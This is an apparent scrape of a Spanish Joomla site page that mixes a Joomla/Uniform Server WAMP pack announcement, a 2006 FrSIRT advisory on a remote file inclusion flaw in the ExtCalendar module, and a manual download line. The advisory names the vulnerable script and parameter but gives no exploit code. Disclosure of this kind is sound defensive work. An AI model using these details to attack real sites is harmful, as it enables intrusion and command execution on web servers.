Presentamos el resultado de integrar el pack de Joomla! Spanish Premium 1.0.15 y Joomla! 1.5.3 Spanish a Uniform Server versión 3.5-Apollo.
Es una aplicación con los paquetes necesarios para hacer correr un entorno WAMP: Windows, Apache, MySql y PHP.
ExtCalendar | File Inclusion Vulnerability
ExtCalendar Module for Mambo/Joomla "mosConfig_absolute_path" File Inclusion Vulnerability Advisory ID : FrSIRT/ADV-2006-2711
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-09
Technical Description
A vulnerability has been identified in ExtCalendar (module for
Mambo/Joomla), which may be exploited by attackers to execute arbitrary
commands. This flaw is due to an input validation error in the
"extcalendar.php" script that fails to validate the
"mosConfig_absolute_path" parameter, which could be exploited by remote
attackers to include malicious files and execute arbitrary commands
with the privileges of the web server.
Affected Products
ExtCalendar (module for Mambo/Joomla) version 0.9.1 and prior
Manual del Usuario 1.0.x Joomla! Spanish en ZIP
